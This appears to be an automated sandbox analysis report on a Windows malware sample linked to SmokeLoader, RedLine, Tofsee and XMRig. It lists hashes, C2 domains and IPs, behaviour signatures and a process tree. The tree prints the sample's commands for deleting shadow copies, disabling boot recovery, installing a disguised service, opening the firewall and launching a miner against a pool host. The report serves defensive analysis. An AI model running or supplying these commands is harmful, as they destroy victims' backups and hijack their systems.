Analysis

  • max time kernel
    136s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    27-08-2021 08:37

General

  • Target

    be8fba1fa1536254d7aeab7b52344a2c.exe

  • Size

    176KB

  • MD5

    be8fba1fa1536254d7aeab7b52344a2c

  • SHA1

    23f42db215a021dfa596fbb72f61e94b04cd36c0

  • SHA256

    20ae56e2ec11dc0b943ea744a21cfd4c166a14732683664bc846286123a18e9f

  • SHA512

    2b7d3745dd90a61cb5bb2ed80e27c6be1c9f48534264771e50226020d84faefa6c814510e90eab0777e50256e29433607a5879cd05e8a9b52fa6b66a3458caf4

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Sergey777

C2

51.254.68.139:15009

Extracted

Family

redline

Botnet

1

C2

176.9.244.86:16284

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 11 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 16 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\be8fba1fa1536254d7aeab7b52344a2c.exe
    "C:\Users\Admin\AppData\Local\Temp\be8fba1fa1536254d7aeab7b52344a2c.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2004
    • C:\Users\Admin\AppData\Local\Temp\be8fba1fa1536254d7aeab7b52344a2c.exe
      "C:\Users\Admin\AppData\Local\Temp\be8fba1fa1536254d7aeab7b52344a2c.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1496
  • C:\Users\Admin\AppData\Local\Temp\D3C3.exe
    C:\Users\Admin\AppData\Local\Temp\D3C3.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    PID:1932
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start
      2⤵
      • Executes dropped EXE
      • Enumerates connected drives
      • Modifies system certificate store
      PID:1948
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
        3⤵
          PID:1804
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic shadowcopy delete
            4⤵
              PID:936
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
            3⤵
              PID:332
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
              3⤵
                PID:1188
                • C:\Windows\SysWOW64\vssadmin.exe
                  vssadmin delete shadows /all /quiet
                  4⤵
                  • Interacts with shadow copies
                  PID:1984
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
                "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -agent 0
                3⤵
                  PID:900
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                  3⤵
                    PID:1592
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      wmic shadowcopy delete
                      4⤵
                        PID:940
                      • C:\Windows\SysWOW64\vssadmin.exe
                        vssadmin delete shadows /all /quiet
                        4⤵
                        • Interacts with shadow copies
                        PID:2184
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      3⤵
                        PID:972
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                        3⤵
                          PID:1156
                      • C:\Windows\SysWOW64\notepad.exe
                        notepad.exe
                        2⤵
                          PID:2040
                      • C:\Users\Admin\AppData\Local\Temp\D6C0.exe
                        C:\Users\Admin\AppData\Local\Temp\D6C0.exe
                        1⤵
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious use of AdjustPrivilegeToken
                        PID:676
                      • C:\Users\Admin\AppData\Local\Temp\D7DA.exe
                        C:\Users\Admin\AppData\Local\Temp\D7DA.exe
                        1⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:572
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rqiigbpf\
                          2⤵
                            PID:1464
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\xniuoaew.exe" C:\Windows\SysWOW64\rqiigbpf\
                            2⤵
                              PID:2040
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\System32\sc.exe" create rqiigbpf binPath= "C:\Windows\SysWOW64\rqiigbpf\xniuoaew.exe /d\"C:\Users\Admin\AppData\Local\Temp\D7DA.exe\"" type= own start= auto DisplayName= "wifi support"
                              2⤵
                                PID:2012
                              • C:\Windows\SysWOW64\sc.exe
                                "C:\Windows\System32\sc.exe" description rqiigbpf "wifi internet conection"
                                2⤵
                                  PID:1072
                                • C:\Windows\SysWOW64\sc.exe
                                  "C:\Windows\System32\sc.exe" start rqiigbpf
                                  2⤵
                                    PID:808
                                  • C:\Windows\SysWOW64\netsh.exe
                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                    2⤵
                                      PID:2032
                                  • C:\Users\Admin\AppData\Local\Temp\DB06.exe
                                    C:\Users\Admin\AppData\Local\Temp\DB06.exe
                                    1⤵
                                    • Executes dropped EXE
                                    PID:1652
                                    • C:\Users\Admin\AppData\Local\Temp\xImzabj022kKhKW.exe
                                      "C:\Users\Admin\AppData\Local\Temp\xImzabj022kKhKW.exe"
                                      2⤵
                                        PID:2240
                                      • C:\Users\Admin\AppData\Local\Temp\MunchingHallstand_2021-08-26_19-29.exe
                                        "C:\Users\Admin\AppData\Local\Temp\MunchingHallstand_2021-08-26_19-29.exe"
                                        2⤵
                                          PID:2268
                                      • C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                        C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of SetThreadContext
                                        • Suspicious use of WriteProcessMemory
                                        PID:1928
                                        • C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                          C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                          2⤵
                                          • Executes dropped EXE
                                          PID:1528
                                        • C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                          C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                          2⤵
                                          • Executes dropped EXE
                                          PID:820
                                        • C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                          C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                          2⤵
                                          • Executes dropped EXE
                                          PID:2008
                                        • C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                          C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                          2⤵
                                          • Executes dropped EXE
                                          PID:788
                                        • C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                          C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                          2⤵
                                            PID:2032
                                          • C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                            C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                            2⤵
                                              PID:2216
                                            • C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                              C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                              2⤵
                                                PID:2344
                                              • C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                                C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                                2⤵
                                                  PID:2632
                                                • C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                                  C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                                  2⤵
                                                    PID:2672
                                                  • C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                                    C:\Users\Admin\AppData\Local\Temp\DEBF.exe
                                                    2⤵
                                                      PID:2776
                                                  • C:\Windows\SysWOW64\explorer.exe
                                                    C:\Windows\SysWOW64\explorer.exe
                                                    1⤵
                                                      PID:1084
                                                    • C:\Windows\explorer.exe
                                                      C:\Windows\explorer.exe
                                                      1⤵
                                                        PID:1756
                                                      • C:\Windows\SysWOW64\explorer.exe
                                                        C:\Windows\SysWOW64\explorer.exe
                                                        1⤵
                                                          PID:1724
                                                        • C:\Windows\SysWOW64\rqiigbpf\xniuoaew.exe
                                                          C:\Windows\SysWOW64\rqiigbpf\xniuoaew.exe /d"C:\Users\Admin\AppData\Local\Temp\D7DA.exe"
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:1544
                                                          • C:\Windows\SysWOW64\svchost.exe
                                                            svchost.exe
                                                            2⤵
                                                            • Drops file in System32 directory
                                                            • Modifies data under HKEY_USERS
                                                            PID:1052
                                                            • C:\Windows\SysWOW64\svchost.exe
                                                              svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                              3⤵
                                                                PID:2524
                                                          • C:\Windows\explorer.exe
                                                            C:\Windows\explorer.exe
                                                            1⤵
                                                              PID:1464
                                                            • C:\Windows\SysWOW64\explorer.exe
                                                              C:\Windows\SysWOW64\explorer.exe
                                                              1⤵
                                                                PID:2036
                                                              • C:\Windows\explorer.exe
                                                                C:\Windows\explorer.exe
                                                                1⤵
                                                                  PID:384
                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                  1⤵
                                                                    PID:1744
                                                                  • C:\Windows\explorer.exe
                                                                    C:\Windows\explorer.exe
                                                                    1⤵
                                                                      PID:568
                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                      1⤵
                                                                        PID:1092
                                                                      • C:\Windows\system32\vssvc.exe
                                                                        C:\Windows\system32\vssvc.exe
                                                                        1⤵
                                                                          PID:2064

                                                                        Network

                                                                        MITRE ATT&CK Enterprise v6

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • memory/332-178-0x0000000000000000-mapping.dmp

                                                                        • memory/384-152-0x0000000000070000-0x0000000000076000-memory.dmp

                                                                          Filesize

                                                                          24KB

                                                                        • memory/384-153-0x0000000000060000-0x000000000006C000-memory.dmp

                                                                          Filesize

                                                                          48KB

                                                                        • memory/384-148-0x0000000000000000-mapping.dmp

                                                                        • memory/568-159-0x0000000000000000-mapping.dmp

                                                                        • memory/568-160-0x0000000000070000-0x0000000000075000-memory.dmp

                                                                          Filesize

                                                                          20KB

                                                                        • memory/568-161-0x0000000000060000-0x0000000000069000-memory.dmp

                                                                          Filesize

                                                                          36KB

                                                                        • memory/572-82-0x0000000000020000-0x0000000000033000-memory.dmp

                                                                          Filesize

                                                                          76KB

                                                                        • memory/572-97-0x0000000000400000-0x00000000023AC000-memory.dmp

                                                                          Filesize

                                                                          31.7MB

                                                                        • memory/572-71-0x0000000000000000-mapping.dmp

                                                                        • memory/676-81-0x0000000000710000-0x0000000000711000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/676-74-0x0000000000A10000-0x0000000000A11000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/676-68-0x0000000000000000-mapping.dmp

                                                                        • memory/808-109-0x0000000000000000-mapping.dmp

                                                                        • memory/900-182-0x0000000000000000-mapping.dmp

                                                                        • memory/936-183-0x0000000000000000-mapping.dmp

                                                                        • memory/940-188-0x0000000000000000-mapping.dmp

                                                                        • memory/972-177-0x0000000000000000-mapping.dmp

                                                                        • memory/1052-133-0x0000000000080000-0x0000000000095000-memory.dmp

                                                                          Filesize

                                                                          84KB

                                                                        • memory/1052-134-0x0000000000089A6B-mapping.dmp

                                                                        • memory/1072-105-0x0000000000000000-mapping.dmp

                                                                        • memory/1084-92-0x0000000000000000-mapping.dmp

                                                                        • memory/1084-94-0x000000006F721000-0x000000006F723000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1084-98-0x0000000000180000-0x00000000001F4000-memory.dmp

                                                                          Filesize

                                                                          464KB

                                                                        • memory/1084-96-0x00000000000D0000-0x000000000013B000-memory.dmp

                                                                          Filesize

                                                                          428KB

                                                                        • memory/1092-171-0x0000000000090000-0x0000000000095000-memory.dmp

                                                                          Filesize

                                                                          20KB

                                                                        • memory/1092-172-0x0000000000080000-0x0000000000089000-memory.dmp

                                                                          Filesize

                                                                          36KB

                                                                        • memory/1092-164-0x0000000000000000-mapping.dmp

                                                                        • memory/1156-176-0x0000000000000000-mapping.dmp

                                                                        • memory/1188-179-0x0000000000000000-mapping.dmp

                                                                        • memory/1256-64-0x0000000002220000-0x0000000002236000-memory.dmp

                                                                          Filesize

                                                                          88KB

                                                                        • memory/1464-117-0x00000000000F0000-0x00000000000F9000-memory.dmp

                                                                          Filesize

                                                                          36KB

                                                                        • memory/1464-116-0x0000000000000000-mapping.dmp

                                                                        • memory/1464-118-0x00000000000E0000-0x00000000000EF000-memory.dmp

                                                                          Filesize

                                                                          60KB

                                                                        • memory/1464-91-0x0000000000000000-mapping.dmp

                                                                        • memory/1496-61-0x0000000000402FAB-mapping.dmp

                                                                        • memory/1496-62-0x00000000765F1000-0x00000000765F3000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1496-60-0x0000000000400000-0x0000000000409000-memory.dmp

                                                                          Filesize

                                                                          36KB

                                                                        • memory/1544-136-0x0000000000400000-0x00000000023AC000-memory.dmp

                                                                          Filesize

                                                                          31.7MB

                                                                        • memory/1592-180-0x0000000000000000-mapping.dmp

                                                                        • memory/1652-79-0x0000000000260000-0x0000000000261000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/1652-76-0x0000000000000000-mapping.dmp

                                                                        • memory/1724-108-0x000000006F481000-0x000000006F483000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/1724-110-0x0000000000090000-0x0000000000097000-memory.dmp

                                                                          Filesize

                                                                          28KB

                                                                        • memory/1724-106-0x0000000000000000-mapping.dmp

                                                                        • memory/1724-111-0x0000000000080000-0x000000000008B000-memory.dmp

                                                                          Filesize

                                                                          44KB

                                                                        • memory/1744-157-0x0000000000090000-0x0000000000094000-memory.dmp

                                                                          Filesize

                                                                          16KB

                                                                        • memory/1744-154-0x0000000000000000-mapping.dmp

                                                                        • memory/1744-158-0x0000000000080000-0x0000000000089000-memory.dmp

                                                                          Filesize

                                                                          36KB

                                                                        • memory/1756-102-0x0000000000000000-mapping.dmp

                                                                        • memory/1756-103-0x0000000000070000-0x0000000000077000-memory.dmp

                                                                          Filesize

                                                                          28KB

                                                                        • memory/1756-104-0x0000000000060000-0x000000000006C000-memory.dmp

                                                                          Filesize

                                                                          48KB

                                                                        • memory/1804-175-0x0000000000000000-mapping.dmp

                                                                        • memory/1928-87-0x00000000000A0000-0x00000000000A1000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/1928-84-0x0000000000000000-mapping.dmp

                                                                        • memory/1928-95-0x0000000004800000-0x0000000004801000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/1932-65-0x0000000000000000-mapping.dmp

                                                                        • memory/1948-122-0x0000000000000000-mapping.dmp

                                                                        • memory/1984-186-0x0000000000000000-mapping.dmp

                                                                        • memory/2004-63-0x0000000000230000-0x000000000023A000-memory.dmp

                                                                          Filesize

                                                                          40KB

                                                                        • memory/2008-162-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                          Filesize

                                                                          128KB

                                                                        • memory/2008-163-0x000000000041A6AE-mapping.dmp

                                                                        • memory/2008-167-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                          Filesize

                                                                          128KB

                                                                        • memory/2012-101-0x0000000000000000-mapping.dmp

                                                                        • memory/2032-114-0x0000000000000000-mapping.dmp

                                                                        • memory/2036-138-0x0000000000080000-0x0000000000089000-memory.dmp

                                                                          Filesize

                                                                          36KB

                                                                        • memory/2036-137-0x0000000000090000-0x0000000000095000-memory.dmp

                                                                          Filesize

                                                                          20KB

                                                                        • memory/2036-128-0x0000000000000000-mapping.dmp

                                                                        • memory/2040-99-0x0000000000000000-mapping.dmp

                                                                        • memory/2040-125-0x0000000000000000-mapping.dmp

                                                                        • memory/2040-151-0x00000000000E0000-0x00000000000E1000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/2184-189-0x0000000000000000-mapping.dmp

                                                                        • memory/2216-200-0x000000000041A6AE-mapping.dmp

                                                                        • memory/2216-222-0x00000000047D0000-0x00000000047D1000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/2240-192-0x0000000000000000-mapping.dmp

                                                                        • memory/2240-196-0x0000000000CE0000-0x0000000000CE1000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/2240-204-0x0000000004870000-0x0000000004871000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/2268-207-0x0000000003100000-0x000000000311D000-memory.dmp

                                                                          Filesize

                                                                          116KB

                                                                        • memory/2268-209-0x0000000004890000-0x00000000048AC000-memory.dmp

                                                                          Filesize

                                                                          112KB

                                                                        • memory/2268-206-0x00000000003D0000-0x0000000000400000-memory.dmp

                                                                          Filesize

                                                                          192KB

                                                                        • memory/2268-208-0x0000000004A11000-0x0000000004A12000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/2268-212-0x0000000004A13000-0x0000000004A14000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/2268-205-0x0000000000400000-0x0000000002CD5000-memory.dmp

                                                                          Filesize

                                                                          40.8MB

                                                                        • memory/2268-211-0x0000000004A14000-0x0000000004A16000-memory.dmp

                                                                          Filesize

                                                                          8KB

                                                                        • memory/2268-210-0x0000000004A12000-0x0000000004A13000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/2268-195-0x0000000000000000-mapping.dmp

                                                                        • memory/2524-213-0x00000000000F0000-0x00000000001E1000-memory.dmp

                                                                          Filesize

                                                                          964KB

                                                                        • memory/2524-217-0x000000000018259C-mapping.dmp

                                                                        • memory/2632-224-0x000000000041A6AE-mapping.dmp

                                                                        • memory/2632-229-0x00000000049A0000-0x00000000049A1000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/2672-231-0x000000000041A6AE-mapping.dmp

                                                                        • memory/2672-236-0x00000000047C0000-0x00000000047C1000-memory.dmp

                                                                          Filesize

                                                                          4KB